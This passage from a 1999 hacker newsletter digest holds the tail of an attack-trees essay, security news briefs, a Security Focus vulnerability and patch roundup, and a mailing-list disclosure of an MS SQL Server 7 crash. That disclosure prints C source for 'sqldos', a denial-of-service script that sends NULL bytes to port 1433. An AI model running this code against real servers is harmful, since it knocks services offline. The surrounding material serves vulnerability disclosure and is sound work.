an attack, but you'll get better with time. Like any security analysis, creating attack trees requires a certain mindset and takes practice. Once you have the attack tree, and have researched all the node values (these values will change over time, both as attacks become easier and as you get more exact information on the values), you can use the attack tree to make security decisions. You can look at the values of the root node to see if the system's goal is vulnerable to attack. You can determine if the system is vulnerable to a particular kind of attack; password guessing, for instance. You can use the attack tree to list the security assumptions of a system; for example, the security of PGP might assume that no one could successfully bribe the programmers. You can determine the impact of a system modification or a new vulnerability discovery: Recalculate the nodes based on the new information and see how the goal node is affected. And you can compare and rank attacks -- which is cheaper, which is more likely to succeed, and the like. One of the surprising things that comes out of this kind of analysis is that the areas people think of as vulnerable usually aren't. With PGP, for example, people generally worry about key length. Should they use 1024-bit RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the key length of RSA doesn't really matter. There are all sorts of other attacks -- installing a keyboard sniffer, modifying the program on the victim's hard drive -- that are much easier than breaking the RSA public key. Increasing the key length from 1024 bits to 2048 bits is like putting an enormous stake into the ground and hoping the enemy runs right into it, as opposed to building a lower palisade around the target. Attack trees give you perspective on the whole system. One of the things that really makes attack trees valuable is that they capture knowledge in a reusable form. Once you've completed the PGP attack tree, you can use it in any situation that uses PGP. The attack tree against PGP becomes part of a larger attack tree. For example, Figure 8 shows an attack tree whose goal is to read a specific message that has been sent from one Windows 98 computer to another. If you look at the root nodes of the tree, the entire attack trees for PGP and for opening a safe fit into this attack tree. This scalability means that you don't have to be an expert in everything. If you're using PGP in a system, you don't have to know the details of the PGP attack tree; all you need to know are the values of the root node. If you're a computer-security expert, you don't have to know the details about how difficult a particular model of safe is to crack; you just need to know the values of the root node. Once you build up a library of attack trees against particular computer programs, door and window locks, network security protocols, or whatever, you can reuse them whenever you need to. For a national security agency concerned about compartmentalizing attack expertise, this kind of system is very useful. Conclusion Attack trees provide a formal methodology for analyzing the security of systems and subsystems. They provide a way to think about security, to capture and reuse expertise about security, and to respond to changes in security. Security is not a product -- it's a process. Attack trees form the basis of understanding that process. DDJ @HWA 22.0 Pandora Updated ~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Simple Nomad Jitsu-Disk finished moving the Pandora Linux code so that Pandora Linux uses libpcap and libnet. Pandora is a set of tools for testing the security and insecurity of Novell Netware. A number of problems have been corrected from the beta release on November 19th, including several problems involving spoofing and sniffing. Libnet helped Jitsu fix all that. The documentation has also been updated, including all the code used to do the builds, and pre-compiled binaries, all wrapped up in a nice big tarball. Nomad Mobile Research Center http://www.nmrc.org/pandora/ @HWA 23.0 [sSh] Busted or Not? ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender Numerous contradictory information about the raids and arrests of YTCracker and Darkness of [sSh] have been received by HNN and other sources. It is pretty clear at this time that YTCracker has not been arrested, yet. (He feels that it is only a matter of time.) OSALL has been trying to keep track on the rumors and innuendoes and get accurate information regarding this breaking story or non-story. OSALL http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html [sSh] Busts 12/02/99 Mike Hudack Editor-in-Chief Note: The following information is presented as best as possible. Contradictions have been streaming into the OSAll headquarters from two FBI agents, numerous Web site defacers and several other people. All claim to know what´s going on, but all contradict each other. We´re leaving this story intact for now, until the dust settles and we can determine the facts of the case, as it were. Correction: YTCracker has not been raided. OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he had not been raided by the FBI or any other government agency. Previous reports published on OSAll and HNN stated that YTCracker had been raided, citing rumors and, in one case on OSAll, an anonymous FBI source. It appears that these reports were incorrect. As of right now it has been confirmed that Darkness has been visited by NASA investigative authorities. FBI visits have not been confirmed but have been mentioned by an anonymous FBI source. The validity and reliability of this FBI source is being called into question as more evidence comes to light. The source expects "a number of groups to fall soon" but gave no timeline or even a guarentee of further arrests. The FBI has already seized logs relating to a number of attacks, including visiting an ISP that one defacer funneled his attacks through. Both the FBI and US Attorney´s Office have denied official comment on an "ongoing investigation." @HWA 24.0 Response to Freedom Extraordinary ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jordan Thursdays long anticipated launch of Freedom 1.0 by Zero Knowledge Systems has proved to be an extraordinary success. Freedom works seamlessly alongside your favorite browser and other Internet applications. You can surf the web, send email, chat, telnet, and participate in newsgroups as you normally would, only now with complete confidence that your personal information is not being collected without your consent. Freedom identifies you on the net with a 'nym' that you choose. There can be only one 'nym' so you may want to reserve your online identity as soon as you can. Freedom 1.0 http://www.zks.net/clickthrough/click.asp?partner_id=542 @HWA 25.0 DCypher.net Team Created ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dcypher A team for the Hacker News Network has been created at DCypher.net. DCypher.Net has accepted the CS Group's CS-Cipher challenge and will attempt to break their 56 bit key using a brute force attack in a distributed computing effort. They promise to give the entire $10,500 prize to whoever actually finds the correct key. (Now that is a pretty strong incentive.) DCypher.net http://www.dcypher.net/ HNN Stats at DCypher.net TeamID:131 Don't forget about our team over at SETI@Home, the search for extraterrestrial life. SETI@Home http://setiathome.ssl.berkeley.edu/ HNN SETI@Home Team Stats http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html @HWA 26.0 Hackers Make it to Mars ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Desolationroad At approximately 12 Noon PST on Friday December 3rd, 1999 a 42 square foot (3.816 sq meters) extremely dense ball of complicated electronics will arrive at the end of its twelve month journey. The 1,270 pounds (576 kg) mass of extremely sophisticated cutting edge technology will crash land onto the surface of an extraterestrial location. (Now thats a damn hack if I ever heard of one.) Jet Propulsion Laboratory http://marslander.jpl.nasa.gov/index.html @HWA 27.0 Security Focus Newsletter #17 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #17 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. NetTerm FTP Server Multiple Vulnerabilities 2. Microsoft IE5 XML HTTP Redirect Vulnerability 3. Sun Java IDE Webserver IP Restriction Failure Vulnerability 4. Vermillion FTPd CWD DoS Vulnerability 5. Mdaemon WebConfig Overflow DoS Vulnerability 6. Cabletron SSR ARP Flood DoS Vulnerability 7. Netscape Navigator Long ASP Argument Vulnerability 8. Deerfield WorldClient Long URL DoS Vulnerability 9. SCO Xsco Buffer Overflow Vulnerability 10. SCO xlock(1) (long username) Buffer Overflow Vulnerability 11. SCO su(1) Buffer Overflow Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Linux syslogd Denial of Service 2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service 3. Vulnerability Patched: Cabletron SSR ARP Flood DoS 4. Vulnerability Patched: SCO su(1) Buffer Overflow 5. Vulnerability Patched: Pine Environment Variable Expansion in URLS IV. INCIDENTS SUMMARY 1. Re: Port 137 and snmp scans (Thread) 2. SunOS rpcbind scans (Thread) 3. Re: cracker probing 1542 (Thread) 4. Re: rpc logging (Thread) 5. SANS and CERT ICMP advisories (Thread) 6. Fw: unsolicited connection(s) (Thread) 7. F5's 3DNS signature + Cisco Distrib Dir (Thread) 8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread) 9. BIND Scanning (Thread) 10. sweep (Thread) 11. pop3/imap crawler.. (Thread) 12. UK Law & Cases Re Malicious action/attacks (Thread) 13. cgi attack 14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread) 15. Port 98 scans & new 3128/8080 scans V. VULN-DEV RESEARCH LIST SUMMARY 1. Re: icq accounts (Thread) 2. Re: WordPad/riched20.dll buffer overflow (Thread) 3. SSH exploit (Thread) 4. lanma256.bmp/lanmannt.bmp security risk? (Thread) 5. Re: development of wordpad exploit (Thread) VI. SECURITY JOBS Seeking Staff: 1. SecurityFocus.com is looking for staff writers for a Windows NT column! 2. NYC - Internet Security Position 3. Security Research Engineer VII. SECURITY SURVEY RESULTS VIII. SECURITY FOCUS TOP 6 TOOLS 1. SecurityFocus.com Pager (Win95/98/NT) 2. Lookout (Windows 2000, Windows 95/98 and Windows NT) 3. cgicheck99 0.4 (Any system supporting rebol) 4. HookProtect (Windows 95/98 and Windows NT) 5. Sun Enterprise Network Security Service Early Access 1 (Java) 6. Pandora for Linux v4 beta 2 (Linux) IX. SPONSOR INFORMATION - CORE SDI X. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the Security Focus 'week in review' newsletter issue 17 sponsored by CORE SDI. http://www.core-sdi.com II. BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27 --------------------------------------------- 1. NetTerm FTP Server Multiple Vulnerabilities BugTraq ID: 819 Remote: Yes Date Published: 1999-11-22 Relevant URL: http://www.securityfocus.com/bid/819 Summary: InterSoft's internet suite includes an FTP server which has been found to have numerous vulnerabilities. Among them: The default configuration allows read/write access to the root of the C: drive for anonymous users. This write access includes overwrite and delete. If the server is setup with 'out of the box' options, anonymous remote users have full access to the operating system files and executables. There is no administrator account, which means that any user with console access can alter the server's settings. The encryption method used on the passwords for user accounts is reported to be weak and easily broken. There are also multiple buffer overflows. Supplying over 1024-character arguments to the following commands will crash the server: dir, ls, mkdir, delete, and rmdir. Also, althouth the PASS buffer is truncated at 16 characters for users with accounts, this limit is not in place for the anonymous user (to allow for proper entry of email addresses as passwords) and a 1024-byte string 'password' will crash the server if user name 'anonymous' is supplied. It may be possible to exploit these overflows to run arbitrary code. 2. Microsoft IE5 XML HTTP Redirect Vulnerability BugTraq ID: 815 Remote: Yes Date Published: 1999-11-22 Relevant URL: http://www.securityfocus.com/bid/815 Summary: A vulnerability in the method IE5 uses to process XML data may allow a malicious web site owner to read files on a visiting user's computer. A web page may be created that contains an XML object type that contains instructions to read known files on a visitor's local host (and or domain). The IE5 client will allow the XML redirect to access files within its own domain. 3. Sun Java IDE Webserver IP Restriction Failure Vulnerability BugTraq ID: 816 Remote: Yes Date Published: 1999-11-23 Relevant URL: http://www.securityfocus.com/bid/816 Summary: These Java development applications include an http server for testing purposes. The server can be configured to only respond to requests from certain IP addresses, however the mechanism fails and any requests received are serviced. The server will allow read access to any file on the filesystem that it haas access to, all the way up to the root directory. In the Netbeans product, this is the default 'out of the box' configuration. In the Forte product. IP addresses must be added manually to a list of permitted clients. Once a single IP address is added, any requests regardless of source are responded to. 4. Vermillion FTPd CWD DoS Vulnerability BugTraq ID: 818 Remote: Yes Date Published: 1999-11-22 Relevant URL: http://www.securityfocus.com/bid/818 Summary: If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD commands with arguments of 504 characters or longer, it will crash. 5. Mdaemon WebConfig Overflow DoS Vulnerability BugTraq ID: 820 Remote: Unknown Date Published: 1999-11-24 Relevant URL: http://www.securityfocus.com/bid/820 Summary: The Mdaemon mail server for Windows includes a small web server for web-based remote administration. This webserver is vulnerable due to an unchecked buffer that handles incoming GET requests. An abnormally large URL sent to the WebConfig service at port 2002 will crash the service. 6. Cabletron SSR ARP Flood DoS Vulnerability BugTraq ID: 821 Remote: Yes Date Published: 1999-11-24 Relevant URL: http://www.securityfocus.com/bid/821 Summary: The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been shown to susceptible to a denial of service attack. The SSR can only handle approximately 200 ARP requests per second. If an attacker can get ICMP traffic to the router, they can flood it with ARP requests, effectively shutting the router down for the duration of the attack. 7. Netscape Navigator Long ASP Argument Vulnerability BugTraq ID: 822 Remote: Yes Date Published: 1999-11-26 Relevant URL: http://www.securityfocus.com/bid/822 Summary: Netscape Communicator 4.7 has been shown to crash when an argument of 800 characters is supplied to a command in an asp page. Some of the data passed as the argument makes it into the EIP and EBP registers, so execution of arbitrary code is a possibility. The overflow could be embedded in a link on a webpage or in an email message for remote attacks. 8. Deerfield WorldClient Long URL DoS Vulnerability BugTraq ID: 823 Remote: Yes Date Published: 1999-11-26 Relevant URL: http://www.securityfocus.com/bid/823 Summary: Deerfield's WorldClient is an email webserver that allows it's users to retrieve email via HTTP. It is susceptible to denial of service attacks due to an unchecked buffer in the request handler. Supplying a long url will crash the server. 9. SCO Xsco Buffer Overflow Vulnerability BugTraq ID: 824 Remote: No Date Published: 1999-11-25 Relevant URL: http://www.securityfocus.com/bid/824 Summary: Under certain versions of Unixware, the SUID program Xsco is vulnerable to a buffer overflow attack. The problem lies in that Xsco does not sanity check user supplied data. 10. SCO xlock(1) (long username) Buffer Overflow Vulnerability BugTraq ID: 825 Remote: No Date Published: 1999-11-25 Relevant URL: http://www.securityfocus.com/bid/825 Summary: Certain versions of Unixware ship with a version of xlock which is vulnerable to a buffer overflow attack. The xlock(1) program locks the local X display until a username and password are entered. In this instance a user can provide an overly long username and overflow a buffer in xlock(1). Given that xlock(1) runs SUID root this will result in a root compromise. 11. SCO su(1) Buffer Overflow Vulnerability BugTraq ID: 826 Remote: No Date Published: 1999-11-25 Relevant URL: http://www.securityfocus.com/bid/826 Summary: Certain versions of Unixware ship with a version of su(1) which is vulnerable to a buffer overflow attack. This attack is possible because su(1) fails to sanity check user supplied data, in this instance a username supplied on the command line. Because su(1) is SUID root this attack may result in root privileges. III. PATCH UPDATES 1999-11-21 to 1999-11-27 ------------------------------------------- 1. Vendor: Red Hat Product: RedHat Linux Patch Location: Red Hat Linux 4.x: Intel: ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm Alpha: ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm Sparc: ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm Source packages: ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm Red Hat Linux 5.x: Intel: ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm Alpha: ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm Sparc: ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm Source packages: ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm Red Hat Linux 6.0: Intel: ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm Sparc: ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm Source packages: ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm Red Hat Linux 6.1: Intel: ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux: RPMS: -RaQ3- ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm -RaQ1 RaQ2 Qube1 Qube2- ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm SRPMS: ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm Vulnerability Patched: Linux syslogd Denial of Service Vulnerability BugTraq ID: 809 Relevant URLS: http://www.securityfocus.com/bid/809 2. Vendor: Sun Mircosystems Product: Solaris 7 Patch Location: http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability BugTraq ID: 811 Relevant URLS: http://www.securityfocus.com/bid/811 3. Vendor: Cabletron Product: Cabletron SmartSwitch Router 8000 firmware 2.x Patch Location: http://www.cabletron.com/download/download.cgi?lib=ssr Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability BugTraq ID: 821 Relevant URLS: http://www.securityfocus.com/bid/821 4. Vendor: SCO Product: Unixware Patch Location: Anonymous ftp (World Wide Web URL): ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text) ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar file) Compuserve: GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these filenames: SSE039.LTR (cover letter, ASCII text) SSE039.TAZ (new binaries, compressed tar file) Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability BugTraq ID: 826 Relevant URLS: http://www.sco.com/support/ftplists/index.html http://www.securityfocus.com/bid/ 5. Vendor: Caldera Product: Caldera OpenLinux (and its other distributions) Patch Location: ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/ Vulnerability Patched: Pine Environment Variable Expansion in URLS Vulnerability BugTraq ID: 810 Relevant URLS: http://www.securityfocus.com/bid/810 INCIDENTS SUMMARY 1999-11-21 to 1999-11-27 ------------------------------------------ 1. Re: Port 137 and snmp scans (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org 2. SunOS rpcbind scans (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com 3. Re: cracker probing 1542 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com 4. Re: rpc logging (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com 5. SANS and CERT ICMP advisories (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com 6. Fw: unsolicited connection(s) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com 7. F5's 3DNS signature + Cisco Distrib Dir (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com 8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl 9. BIND Scanning (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU 10. sweep (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com 11. pop3/imap crawler.. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org 12. UK Law & Cases Re Malicious action/attacks (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk 13. cgi attack Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr 14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br 15. Port 98 scans & new 3128/8080 scans Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27 ---------------------------------------------------------- 1. Re: icq accounts (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu 2. Re: WordPad/riched20.dll buffer overflow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com 3. SSH exploit (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com 4. lanma256.bmp/lanmannt.bmp security risk? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se 5. Re: development of wordpad exploit (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net VI. SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27 --------------------------------------------------- 1. SecurityFocus.com is looking for staff writers for a Windows NT column! Reply to: Alfred Huger Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com 2. NYC - Internet Security Position Reply to: timoe@interworld.com Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com 3. Security Research Engineer Reply to: Samuel Cure Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com VII. SECURITY SURVEY 1999-11-15 to 1999-11-27 ---------------------------------------------- The question for 1999-11-15 to 1999-11-27 was: Which Security conference do you think is more useful to attendees? (Bang for your buck) SANS 31% / 30 votes BlackHat 15% / 15 votes TISC 4% / 4 votes CSI 5% / 5 votes Chaos Communications Congress 6% / 6 votes Defcon 30% / 29 votes Total number of votes: 94 votes VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27 -------------------------------------------------------- 1. SecurityFocus.com Pager by SecurityFocus.com URL: http://www.securityfocus.com/pager/sf_pgr20.zip Platforms: Win95/98/NT Number of downloads: 1690 This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 2. Lookout by Dragonmount Networks URL: http://www.dragonmount.net/software/lookout/ Platforms: Windows 2000, Windows 95/98 and Windows NT Number of downloads: 1222 Lookout provides raw access to data sent over a TCP connection, allowing the inspection of protocols and the testing of buffers. Lookout connects to a foreign host's port and allows you to communicates with the host. Alternatively,Lookout can listen on a port and wait for another host to connect. Lookout can send variable length strings to test buffers easily. 3. cgicheck99 0.4 by deepquest URL: http://www.deepquest.pf/ Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000, Windows 3.x, Windows 95/98, Windows CE and Windows NT Number of downloads: 1079 This is one of the worlds most cross platform cgi scanners, running on 37 operating systems! Even Palmos soon! Will check for 119 of common cgi and other remote issues. Plus it will report you the Bugtraq ID of some vulnerabilities. Get the rebol interpreter at http://www.rebol.com. 4. HookProtect by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html Platforms: Windows 95/98 and Windows NT Number of downloads: 777 HookProtect version 2.05 is an another powerful product of PCinvestigator series. It is specialized on detecting the programs that infringe the privacy and confidentiality on personal computers. There are many various types of such programs: keyloggers, interceptors, spies, Trojans and so on. Their main function is monitoring of some kind of user's activity on a computer (for example, typing the text, running the applications, opening the windows, Internet activity, etc.). 5. Pandora for Linux v4 beta 2 by Nomad Mobile Research Centre URL: http://www.nmrc.org/pandora Platforms: Linux Number of downloads: 693 BETA - Online point and click auditing of Novell Netware from Windows NT. Currently spoofing works but lots of crashes on SP3 (we're working on it). Attach to server with password hashes extracted from Offline program. Search for target servers. Attach to a server and grab user accounts without logging in. Dictionary attack against user account. Multiple Denial of Service attacks. Improved spoofing and hijacking by using realtime sniffing. Works against Netware 4 and 5. 6. Sun Enterprise Network Security Service Early Access 1 by Sun Microsystems URL: http://www.sun.com/software/communitysource/senss/ Platforms: Java Number of downloads: 637 Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based security solution: a tool that enables organizations to audit and secure their systems and networks in a modern, heterogeneous, corporate intranet. The SENSS software is not yet complete; this is the Early Access 1 release, made available for the benefit of parties with a professional interest in network security, for their experimentation and comment. The source code is licensed under the Sun Community Source-Code License, consistent with the Sun Community Source License principles. IX. SPONSOR INFORMATION - ------------------------------------------ URL: http://www.core-sdi.com CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. CORE SDI also has extensive experiance dealing with financial and government contracts through out Latin and North America. X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. Alfred Huger VP of Engineering SecurityFocus.com @HWA 28.0 SQL 7 "Magic Packet" DoS ~~~~~~~~~~~~~~~~~~~~~~~~ From NTSecurity list Kevork Belian discovered this on Dec. 1. I have been working with his code trying to replicate the results but have yet to be successful. This does not mean that Kevork's findings are incorrect, it just means that I need to do more testing. I don't believe in holding information back from the mailing list so here are the complete details as received from Kevork. Including his code. This was tested on SQL 7.00.699 MS SQL Server TCP/IP net library must be enabled. Sending more than 3 NULL bytes in the TCP data can crash the SQL Server. MS SQL listens on TCP port 1433. If this attack is successful you will see an event 17055 in your log and you will have to reboot to restore service. It has been suggested that a solution would be to block incoming traffic on port 1433 or disable the TCP/IP net library. Of course this could have an impact on the functionality of the product. It would be preferable to have a MS hotfix for this issue. Microsoft has been notified and are working on the situation themselves. It is unknown at this time if this attack is actually being carried out. ============ original text from Kevork Belian======== Description: MS SQL Server 7.0 silently crashes when sent a TCP packet containing more than 2 NULLs as data. I tested this on machines running SQL Server version 7.00.699 (SP 1). The NT box is running NT Server with SP 4 (I don't think the Service Pack is an issue since NT is not affected). If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL Server listening on port 1433. The SQL server raises an event 17055 with fatal exception EXCEPTION_ACCESS VIOLATION. I have noticed that you might experience a situation when the SQL Server won't crash at first; keep resending the packet until it crashes (hopefully). It puzzles me why other people weren't able to reproduce it. Is it a misconfiguartion issue (I seriosly doubt it). thanks Kevork Belian ========end text========= ====begin script from Kevork Belian===== /* ** sqldos.c -- a DoS attack agains MS SQL Server */ #include #include #include #include #include #include #include #include #define PORT 1433 /* the port SQL Server listens on */ int main(int argc, char *argv[]) { int sockfd, numbytes; struct hostent *he; char buff[65535]; struct sockaddr_in target_addr; if (argc != 2) { fprintf(stderr,"Usage: sqldos target\n"); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) perror("gethostbyname"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket error"); exit(1); } target_addr.sin_family = AF_INET; target_addr.sin_port = htons(PORT); target_addr.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target_addr.sin_zero), 8); if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) { perror("connect error"); exit(1); } memset(&buff, 0, 3); if ((numbytes=send(sockfd, buff, 14, 0)) == -1) { perror("send errot"); exit(1); } close(sockfd); return 0; } =======end script========= Of course credit has to go to Kevork Belian as he made the discovery. I would be interested to hear if anyone else can replicate this. Regards; Steve Manzuik Moderator Win2K Security Advice _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. 